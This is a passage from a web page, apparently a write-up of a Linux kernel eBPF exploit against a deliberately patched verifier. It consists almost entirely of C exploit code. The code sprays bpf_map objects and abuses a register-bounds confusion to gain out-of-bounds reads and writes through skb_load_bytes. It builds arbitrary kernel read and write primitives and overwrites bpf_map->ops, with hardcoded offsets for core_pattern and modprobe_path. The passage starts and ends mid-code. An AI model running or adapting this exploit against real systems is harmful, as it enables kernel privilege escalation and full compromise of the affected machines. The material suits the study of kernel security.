arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(key) = fp-0x10 BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10), // call map_lookup_elem(mapfd, &amp;key(-&gt;0)) BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), BPF_MOV64_REG(BPF_REG_6, BPF_REG_0), // r6 = r0 == map_elem BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0), // r7 = [r0] == (val=1, mask=0xffffffffffffffff) BPF_MOV64_REG(BPF_REG_1, BPF_REG_7), // r1 = r7 BPF_ALU64_IMM(BPF_RSH, BPF_REG_1, 32), // r1 = (val=0, mask=0x00000000ffffffff) BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 32), // r1 = (val=0, mask=0xffffffff00000000) BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe), // r2 = 0x00000000fffffffe BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32), // r2 = (val=0xfffffffe00000000, mask=0) BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 1), // r2 = (val=0xfffffffe00000001, mask=0) // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp; // (~this.val)). // And if r1.mask == (u64)0, __mark_reg_known -&gt; // ___mark_reg_known is called. // By this calling then r1&#39;s min and max will be imm. // Because (~0xffffffff00000001) &amp; 0xffffffff00000000 == 0 and // (~0xfffffffe00000001) &amp; 0xffffffff00000000 == 0x100000000, we must use // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe). BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2), // r1 = (s32_min=1, s32_max=0, u32_min=1, // u32_max=0). BPF_MOV32_REG(BPF_REG_1, BPF_REG_1), // r1(w1) = (s32_min=1, s32_max=0, // u32_min=1, u32_max=0). BPF_MOV64_REG( BPF_REG_2, BPF_REG_7), // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff) BPF_ALU64_IMM(BPF_AND, BPF_REG_2, 0x1), // r2 = (val=1, mask=0x1) BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_2), // r1 = r1 + r2 == (actual_val = 2; s32_min=1, // s32_max=1, u32_min=1, u32_max=1) == // (actual_val=2; val=1, mask=0) BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, -1), // r1 = r1 + -1 == (actual_val=1; val=0, mask=0) BPF_MOV64_REG(BPF_REG_8, BPF_REG_1), // r8 = r1 == (actual_val=1; val=0, mask=0) // arg1(skb) BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08), // arg2(offset) BPF_MOV64_IMM(BPF_REG_ARG2, 0), // arg3(to) = fp-0x20 BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP), // arg3 = fp BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20), // arg3 = arg3(fp)-0x20 BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6, -0x18), // *(u64*)(fp-0x18) = arg3 == fp-0x20 // arg4(len) BPF_MOV64_REG(BPF_REG_ARG4, BPF_REG_8), // arg4 = r8 == (actual_val=1; val=0, mask=0) BPF_ALU64_IMM( BPF_MUL, BPF_REG_ARG4, 0x10 - 1), // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0) BPF_ALU64_IMM( BPF_ADD, BPF_REG_ARG4, 1), // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0) // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0)) BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes), // fp-0x18 = addr // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(&amp;key) BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10), // arg3(&amp;val) BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18), // arg4(flags) BPF_MOV64_IMM(BPF_REG_ARG4, 0), // map_update_elem(mapfd, &amp;key, &amp;val, 0) BPF_EMIT_CALL(BPF_FUNC_map_update_elem), BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN(), }; union bpf_attr prog_attr = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = sizeof(insns) / sizeof(insns[0]), .insns = (uint64_t)insns, .license = (uint64_t)&#34;GPL v2&#34;, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log, }; int progfd = bpf(BPF_PROG_LOAD, &amp;prog_attr); if (progfd &lt; 0) { puts(&#34;============[failed reason]============&#34;); printf(&#34;%s\n&#34;, verifier_log); fatal(&#34;bpf(BPF_PROG_LOAD)&#34;); } int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) { fatal(&#34;socketpair&#34;); } if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;progfd, sizeof(int))) { fatal(&#34;setsockopt&#34;); } uint64_t buf[] = {0xdeadbeefcafebebe, addr}; write(socks[1], buf, sizeof(buf)); bpf_map_lookup(mapfd, 0, &amp;map_val); close(socks[0]); close(socks[1]); close(progfd); return map_val; } uint64_t bpf_map_addr = 0; int main() { srand(time(NULL)); char verifier_log[0x10000]; make_corrupted_map(); find_corrupted_map_and_leak_bpf_map_addr(); if (corrupted_map_fd == 0) { puts(&#34;[-] Failed to find corrupted bpf_map&#34;); return -1; } printf(&#34;[+] mapfd: %d\n&#34;, mapfd); printf(&#34;[+] corrupted_map_fd: %d\n&#34;, corrupted_map_fd); printf(&#34;[+] bpf_map_addr: 0x%016lx\n&#34;, bpf_map_addr); puts(&#34;[*] Restore corrupted map...&#34;); uint64_t bpf_map_ops = aar64(bpf_map_addr) + 8; aaw64(bpf_map_addr, bpf_map_ops); return 0; }</code></pre></div> <h4 id="leak-addr-of-jit-code-using-oob-read--heap-spray">Leak addr of JIT code using oob read &amp; heap spray</h4> <div class="collapsable-code"> <input id="254613798" type="checkbox" checked /> <label for="254613798"> <span class="collapsable-code__language">c</span> <span class="collapsable-code__title">leak_jit_addr_using_oob_read.c</span> <span class="collapsable-code__toggle" data-label-expand="Show" data-label-collapse="Hide"></span> </label> <pre class="language-c" > <code>// Patch location: // https://elixir.bootlin.com/linux/v5.18.14/source/kernel/bpf/verifier.c#L7957 // Diff: // 7957c7957,7958 // &lt; __mark_reg32_known(dst_reg, var32_off.value); // --- // &gt; // `scalar_min_max_or` will handler the case // &gt; //__mark_reg32_known(dst_reg, var32_off.value); #include &lt;asm-generic/socket.h&gt; #include &lt;fcntl.h&gt; #include &lt;linux/bpf.h&gt; #include &lt;stdint.h&gt; #include &lt;stdio.h&gt; #include &lt;stdlib.h&gt; #include &lt;string.h&gt; #include &lt;sys/socket.h&gt; #include &lt;sys/syscall.h&gt; #include &lt;sys/types.h&gt; #include &lt;time.h&gt; #include &lt;unistd.h&gt; #include &#34;bpf_insn.h&#34; #define KERNEL_BASE 0xffffffff81000000 #define BPF_MAP_OPS_OFFSET (0xffffffff81c124a0 - KERNEL_BASE) #define BPF_MAP_OPS_LOOKUP_IDX 12 #define BPF_MAP_OPS_LOOKUP_ELEM_OFFSET \ (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_LOOKUP_IDX * 8) #define BPF_MAP_OPS_UPDATE_ELEM_IDX 13 #define BPF_MAP_OPS_UPDATE_ELEM_OFFSET \ (BPF_MAP_OPS_OFFSET + BPF_MAP_OPS_UPDATE_ELEM_IDX * 8) #define OPS_CONTAINING_RET_OFFSET (0xffffffff81c15fc8 - KERNEL_BASE) #define CORE_PATTERN_OFFSET (0xffffffff81eb25e0 - KERNEL_BASE) #define MODBPROB_OFFSET (0xffffffff81e37fe0 - KERNEL_BASE) void get_enter_to_continue(const char* msg) { puts(msg); getchar(); } void fatal(const char* msg) { perror(msg); // get_enter_to_continue(&#34;Press enter to exit...&#34;); exit(-1); } int bpf(int cmd, union bpf_attr* attrs) { return syscall(__NR_bpf, cmd, attrs, sizeof(*attrs)); } int bpf_map_create(int val_size, int max_entries) { union bpf_attr attr = { .map_type = BPF_MAP_TYPE_ARRAY, .key_size = sizeof(int), .value_size = val_size, .max_entries = max_entries, }; int map_fd = bpf(BPF_MAP_CREATE, &amp;attr); if (map_fd &lt; 0) { fatal(&#34;bpf(BPF_MAP_CREATE)&#34;); } return map_fd; } int bpf_map_update(int map_fd, int key, void* pval) { union bpf_attr attr = { .map_fd = map_fd, .key = (uint64_t)&amp;key, .value = (uint64_t)pval, .flags = BPF_ANY, }; int res = bpf(BPF_MAP_UPDATE_ELEM, &amp;attr); if (res &lt; 0) { fatal(&#34;bpf(BPF_MAP_UPDATE_ELEM)&#34;); } return res; } int bpf_map_lookup(int map_fd, int key, void* pval) { union bpf_attr attr = { .map_fd = map_fd, .key = (uint64_t)&amp;key, .value = (uint64_t)pval, .flags = BPF_ANY, }; return bpf(BPF_MAP_LOOKUP_ELEM, &amp;attr); } int mapfd; int map_spray_fd[0x100]; void make_corrupted_map() { uint64_t map_val = 1; puts(&#34;[*] Spray struct bpf_map...&#34;); for (int i = 0; i &lt; sizeof(map_spray_fd) / 4; i++) { map_spray_fd[i] = bpf_map_create(sizeof(uint64_t), 1); bpf_map_update(map_spray_fd[i], 0, &amp;map_val); } mapfd = map_spray_fd[0x81]; char verifier_log[0x10000]; bpf_map_update(mapfd, 0, &amp;map_val); struct bpf_insn insns[] = { // BPF_REG_ARG1 == struct __sk_buff BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1, -0x08), // *(u64*)(fp-0x08) = skb // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(key) = fp-0x10 BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10), // call map_lookup_elem(mapfd, &amp;key(-&gt;0)) BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), BPF_MOV64_REG(BPF_REG_6, BPF_REG_0), // r6 = r0 == map_elem BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0), // r7 = [r0] == (val=1, mask=0xffffffffffffffff) BPF_MOV64_REG(BPF_REG_1, BPF_REG_7), // r1 = r7 BPF_ALU64_IMM(BPF_RSH, BPF_REG_1, 32), // r1 = (val=0, mask=0x00000000ffffffff) BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 32), // r1 = (val=0, mask=0xffffffff00000000) BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe), // r2 = 0x00000000fffffffe BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32), // r2 = (val=0xfffffffe00000000, mask=0) BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 1), // r2 = (val=0xfffffffe00000001, mask=0) // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp; // (~this.val)). // And if r1.mask == (u64)0, __mark_reg_known -&gt; // ___mark_reg_known is called. // By this calling then r1&#39;s min and max will be imm. // Because (~0xffffffff00000001) &amp; 0xffffffff00000000 == 0 and // (~0xfffffffe00000001) &amp; 0xffffffff00000000 == 0x100000000, we must use // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe). BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2), // r1 = (s32_min=1, s32_max=0, u32_min=1, // u32_max=0). BPF_MOV32_REG(BPF_REG_1, BPF_REG_1), // r1(w1) = (s32_min=1, s32_max=0, // u32_min=1, u32_max=0). BPF_MOV64_REG( BPF_REG_2, BPF_REG_7), // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff) BPF_ALU64_IMM(BPF_AND, BPF_REG_2, 0x1), // r2 = (val=1, mask=0x1) BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_2), // r1 = r1 + r2 == (actual_val = 2; s32_min=1, // s32_max=1, u32_min=1, u32_max=1) == // (actual_val=2; val=1, mask=0) BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, -1), // r1 = r1 + -1 == (actual_val=1; val=0, mask=0) BPF_MOV64_REG(BPF_REG_8, BPF_REG_1), // r8 = r1 == (actual_val=1; val=0, mask=0) // arg1(skb) BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08), // arg2(offset) BPF_MOV64_IMM(BPF_REG_ARG2, 0), // arg3(to) = map_elem BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_6), // arg3 = r6 == map_elem // arg4(len) BPF_MOV64_REG(BPF_REG_ARG4, BPF_REG_8), // arg4 = r8 == (actual_val=1; val=0, mask=0) BPF_ALU64_IMM(BPF_MUL, BPF_REG_ARG4, 0xf2 - 1), // arg4 = (0xf2-1) * arg4 == (actual_val=0xf2-1; // val=0, mask=0) BPF_ALU64_IMM( BPF_ADD, BPF_REG_ARG4, 1), // arg4 = arg4 + 1 == (actual_val=0xf2; val=0x1, mask=0) // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0xf2; val=0x1, mask=0)) BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes), // fp-0x18 = addr BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN(), }; union bpf_attr prog_attr = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = sizeof(insns) / sizeof(insns[0]), .insns = (uint64_t)insns, .license = (uint64_t)&#34;GPL v2&#34;, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log, }; int progfd = bpf(BPF_PROG_LOAD, &amp;prog_attr); if (progfd &lt; 0) { puts(&#34;============[failed reason]============&#34;); printf(&#34;%s\n&#34;, verifier_log); fatal(&#34;bpf(BPF_PROG_LOAD)&#34;); } int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) { fatal(&#34;socketpair&#34;); } if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;progfd, sizeof(int))) { fatal(&#34;setsockopt&#34;); } char buf[0x100] = { 0, }; // Overwrite low byte of bpf_map-&gt;ops // (https://elixir.bootlin.com/linux/v5.18.14/source/include/linux/bpf.h#L63) uint16_t ops_containing_ret_offset = (OPS_CONTAINING_RET_OFFSET - 8 * BPF_MAP_OPS_UPDATE_ELEM_IDX) &amp; 0xffff; printf(&#34;ops_containing_ret_offset: 0x%x\n&#34;, ops_containing_ret_offset); *(uint16_t*)(&amp;buf[0xf0]) = ops_containing_ret_offset; write(socks[1], buf, sizeof(buf)); close(socks[0]); close(socks[1]); close(progfd); } int corrupted_map_fd; uint64_t jit_addr; void find_corrupted_map_and_leak_bpf_map_addr() { char verifier_log[0x10000]; for (int i = 0; i &lt; sizeof(map_spray_fd) / 4; ++i) { int cur_map_fd = map_spray_fd[i]; if (cur_map_fd == mapfd) { continue; } // uint64_t map_val = 0; // int ret = bpf_map_update(cur_map_fd, 0, &amp;map_val); // printf(&#34;ret: 0x%x, val: 0x%lx\n&#34;, ret, map_val); struct bpf_insn insns[] = { // BPF_REG_ARG1 == struct __sk_buff BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1, -0x08), // *(u64*)(fp-0x08) = skb // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, cur_map_fd), // arg2(&amp;key) = fp-0x10 &lt;- 0 BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10), // arg3(&amp;val) = fp-0x10 &lt;- 0 BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_ARG2), // arg4(flags) BPF_MOV64_IMM(BPF_REG_ARG4, 0), // map_update_elem(mapfd, fp-0x10, fp-0x10, 0) or map_lookup_elem(mapfd, // fp-0x10) if corrupted BPF_EMIT_CALL(BPF_FUNC_map_update_elem), BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_0, -0x18), // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(&amp;key) = fp-0x10 &lt;- 0 BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10), // arg3(&amp;val) = fp-0x18 &lt;- return value of map_update_elem or // map_lookup_elem. BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x18), // arg4(flags) BPF_MOV64_IMM(BPF_REG_ARG4, 0), // map_update_elem(mapfd, fp-0x10, fp-0x18, 0) BPF_EMIT_CALL(BPF_FUNC_map_update_elem), BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN(), }; union bpf_attr prog_attr = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = sizeof(insns) / sizeof(insns[0]), .insns = (uint64_t)insns, .license = (uint64_t)&#34;GPL v2&#34;, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log, }; int progfd = bpf(BPF_PROG_LOAD, &amp;prog_attr); if (progfd &lt; 0) { puts(&#34;============[failed reason]============&#34;); printf(&#34;%s\n&#34;, verifier_log); fatal(&#34;bpf(BPF_PROG_LOAD)&#34;); } int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) { fatal(&#34;socketpair&#34;); } if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;progfd, sizeof(int))) { fatal(&#34;setsockopt&#34;); } write(socks[1], &#34;Hello&#34;, 5); uint64_t val; bpf_map_lookup(mapfd, 0, &amp;val); close(socks[0]); close(socks[1]); close(progfd); if (val != 0) { jit_addr = val; corrupted_map_fd = cur_map_fd; return; } } } uint64_t aaw64(uint64_t addr, uint64_t val) { char verifier_log[0x10000]; uint64_t map_val = 1; bpf_map_update(mapfd, 0, &amp;map_val); struct bpf_insn insns[] = { // BPF_REG_ARG1 == struct __sk_buff BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1, -0x08), // *(u64*)(fp-0x08) = skb // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(key) = fp-0x10 BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10), // call map_lookup_elem(mapfd, &amp;key(-&gt;0)) BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), BPF_MOV64_REG(BPF_REG_6, BPF_REG_0), // r6 = r0 == map_elem BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0), // r7 = [r0] == (val=1, mask=0xffffffffffffffff) BPF_MOV64_REG(BPF_REG_1, BPF_REG_7), // r1 = r7 BPF_ALU64_IMM(BPF_RSH, BPF_REG_1, 32), // r1 = (val=0, mask=0x00000000ffffffff) BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 32), // r1 = (val=0, mask=0xffffffff00000000) BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe), // r2 = 0x00000000fffffffe BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32), // r2 = (val=0xfffffffe00000000, mask=0) BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 1), // r2 = (val=0xfffffffe00000001, mask=0) // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp; // (~this.val)). // And if r1.mask == (u64)0, __mark_reg_known -&gt; // ___mark_reg_known is called. // By this calling then r1&#39;s min and max will be imm. // Because (~0xffffffff00000001) &amp; 0xffffffff00000000 == 0 and // (~0xfffffffe00000001) &amp; 0xffffffff00000000 == 0x100000000, we must use // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe). BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2), // r1 = (s32_min=1, s32_max=0, u32_min=1, // u32_max=0). BPF_MOV32_REG(BPF_REG_1, BPF_REG_1), // r1(w1) = (s32_min=1, s32_max=0, // u32_min=1, u32_max=0). BPF_MOV64_REG( BPF_REG_2, BPF_REG_7), // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff) BPF_ALU64_IMM(BPF_AND, BPF_REG_2, 0x1), // r2 = (val=1, mask=0x1) BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_2), // r1 = r1 + r2 == (actual_val = 2; s32_min=1, // s32_max=1, u32_min=1, u32_max=1) == // (actual_val=2; val=1, mask=0) BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, -1), // r1 = r1 + -1 == (actual_val=1; val=0, mask=0) BPF_MOV64_REG(BPF_REG_8, BPF_REG_1), // r8 = r1 == (actual_val=1; val=0, mask=0) // arg1(skb) BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08), // arg2(offset) BPF_MOV64_IMM(BPF_REG_ARG2, 0), // arg3(to) = fp-0x20 BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP), // arg3 = fp BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20), // arg3 = arg3(fp)-0x20 BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG3, -0x18), // *(u64*)(fp-0x18) = arg3 == fp-0x20 // arg4(len) BPF_MOV64_REG(BPF_REG_ARG4, BPF_REG_8), // arg4 = r8 == (actual_val=1; val=0, mask=0) BPF_ALU64_IMM( BPF_MUL, BPF_REG_ARG4, 0x10 - 1), // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0) BPF_ALU64_IMM( BPF_ADD, BPF_REG_ARG4, 1), // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0) // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0)) BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes), // fp-0x18 = addr // arg1(skb) BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08), // arg2(offset) BPF_MOV64_IMM(BPF_REG_ARG2, 0x10), // arg3(to) = addr BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18), // arg3 = fp-0x18 == addr // arg4(len) BPF_MOV64_IMM(BPF_REG_ARG4, 8), // skb_load_bytes(skb, 0x10, addr, 8) BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes), BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN(), }; union bpf_attr prog_attr = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = sizeof(insns) / sizeof(insns[0]), .insns = (uint64_t)insns, .license = (uint64_t)&#34;GPL v2&#34;, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log, }; int progfd = bpf(BPF_PROG_LOAD, &amp;prog_attr); if (progfd &lt; 0) { puts(&#34;============[failed reason]============&#34;); printf(&#34;%s\n&#34;, verifier_log); fatal(&#34;bpf(BPF_PROG_LOAD)&#34;); } int socks[2]; if (socketpair(AF_UNIX, SOCK_DGRAM, 0, socks)) { fatal(&#34;socketpair&#34;); } if (setsockopt(socks[0], SOL_SOCKET, SO_ATTACH_BPF, &amp;progfd, sizeof(int))) { fatal(&#34;setsockopt&#34;); } uint64_t buf[] = {0xdeadbeefcafebebe, addr, val}; write(socks[1], buf, sizeof(buf)); close(socks[0]); close(socks[1]); close(progfd); return buf[0]; } uint64_t aar64(uint64_t addr) { char verifier_log[0x10000]; uint64_t map_val = 1; bpf_map_update(mapfd, 0, &amp;map_val); struct bpf_insn insns[] = { // BPF_REG_ARG1 == struct __sk_buff BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_ARG1, -0x08), // *(u64*)(fp-0x08) = skb // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(key) = fp-0x10 BPF_ST_MEM(BPF_DW, BPF_REG_FP, -0x10, 0), BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10), // call map_lookup_elem(mapfd, &amp;key(-&gt;0)) BPF_EMIT_CALL(BPF_FUNC_map_lookup_elem), BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), BPF_EXIT_INSN(), BPF_MOV64_REG(BPF_REG_6, BPF_REG_0), // r6 = r0 == map_elem BPF_LDX_MEM(BPF_DW, BPF_REG_7, BPF_REG_0, 0), // r7 = [r0] == (val=1, mask=0xffffffffffffffff) BPF_MOV64_REG(BPF_REG_1, BPF_REG_7), // r1 = r7 BPF_ALU64_IMM(BPF_RSH, BPF_REG_1, 32), // r1 = (val=0, mask=0x00000000ffffffff) BPF_ALU64_IMM(BPF_LSH, BPF_REG_1, 32), // r1 = (val=0, mask=0xffffffff00000000) BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe), // r2 = 0x00000000fffffffe BPF_ALU64_IMM(BPF_LSH, BPF_REG_2, 32), // r2 = (val=0xfffffffe00000000, mask=0) BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, 1), // r2 = (val=0xfffffffe00000001, mask=0) // When r1|=r2, r1 = (val=r1.val|r2.val, mask=(r1.mask|r2.mask) &amp; // (~this.val)). // And if r1.mask == (u64)0, __mark_reg_known -&gt; // ___mark_reg_known is called. // By this calling then r1&#39;s min and max will be imm. // Because (~0xffffffff00000001) &amp; 0xffffffff00000000 == 0 and // (~0xfffffffe00000001) &amp; 0xffffffff00000000 == 0x100000000, we must use // BPF_MOV64_IMM(BPF_REG_2, 0x00000000fffffffe). BPF_ALU64_REG(BPF_OR, BPF_REG_1, BPF_REG_2), // r1 = (s32_min=1, s32_max=0, u32_min=1, // u32_max=0). BPF_MOV32_REG(BPF_REG_1, BPF_REG_1), // r1(w1) = (s32_min=1, s32_max=0, // u32_min=1, u32_max=0). BPF_MOV64_REG( BPF_REG_2, BPF_REG_7), // r2 = r7 == [r0] == (val=1, mask=0xffffffffffffffff) BPF_ALU64_IMM(BPF_AND, BPF_REG_2, 0x1), // r2 = (val=1, mask=0x1) BPF_ALU64_REG(BPF_ADD, BPF_REG_1, BPF_REG_2), // r1 = r1 + r2 == (actual_val = 2; s32_min=1, // s32_max=1, u32_min=1, u32_max=1) == // (actual_val=2; val=1, mask=0) BPF_ALU64_IMM(BPF_ADD, BPF_REG_1, -1), // r1 = r1 + -1 == (actual_val=1; val=0, mask=0) BPF_MOV64_REG(BPF_REG_8, BPF_REG_1), // r8 = r1 == (actual_val=1; val=0, mask=0) // arg1(skb) BPF_LDX_MEM(BPF_DW, BPF_REG_ARG1, BPF_REG_FP, -0x08), // arg2(offset) BPF_MOV64_IMM(BPF_REG_ARG2, 0), // arg3(to) = fp-0x20 BPF_MOV64_REG(BPF_REG_ARG3, BPF_REG_FP), // arg3 = fp BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG3, -0x20), // arg3 = arg3(fp)-0x20 BPF_STX_MEM(BPF_DW, BPF_REG_FP, BPF_REG_6, -0x18), // *(u64*)(fp-0x18) = arg3 == fp-0x20 // arg4(len) BPF_MOV64_REG(BPF_REG_ARG4, BPF_REG_8), // arg4 = r8 == (actual_val=1; val=0, mask=0) BPF_ALU64_IMM( BPF_MUL, BPF_REG_ARG4, 0x10 - 1), // arg4 = 0x0f * arg4 == (actual_val=0x0f; val=0, mask=0) BPF_ALU64_IMM( BPF_ADD, BPF_REG_ARG4, 1), // arg4 = arg4 + 1 == (actual_val=0x10; val=0x1, mask=0) // skb_load_bytes(skb, 0, fp-0x20, (actual_val=0x10; val=0x1, mask=0)) BPF_EMIT_CALL(BPF_FUNC_skb_load_bytes), // fp-0x18 = addr // arg1(mapfd) BPF_LD_MAP_FD(BPF_REG_ARG1, mapfd), // arg2(&amp;key) BPF_MOV64_REG(BPF_REG_ARG2, BPF_REG_FP), BPF_ALU64_IMM(BPF_ADD, BPF_REG_ARG2, -0x10), // arg3(&amp;val) BPF_LDX_MEM(BPF_DW, BPF_REG_ARG3, BPF_REG_FP, -0x18), // arg4(flags) BPF_MOV64_IMM(BPF_REG_ARG4, 0), // map_update_elem(mapfd, &amp;key, &amp;val, 0) BPF_EMIT_CALL(BPF_FUNC_map_update_elem), BPF_MOV64_IMM(BPF_REG_0, 0), BPF_EXIT_INSN(), }; union bpf_attr prog_attr = { .prog_type = BPF_PROG_TYPE_SOCKET_FILTER, .insn_cnt = sizeof(insns) / sizeof(insns[0]), .insns = (uint64_t)insns, .license = (uint64_t)&#34;GPL v2&#34;, .log_level = 2, .log_size = sizeof(verifier_log), .log_buf = (uint64_t)verifier_log, }; int progfd = bpf(BPF_PROG_LOAD, &amp;prog_attr); if (progfd &lt; 0) { puts(&#34;============[failed reason]============&#34;); printf(&#34;%s\n&#34;, verifier_log); fatal(&#34;bpf(BPF_PROG_LOAD)&#34;); } int socks[2]; if 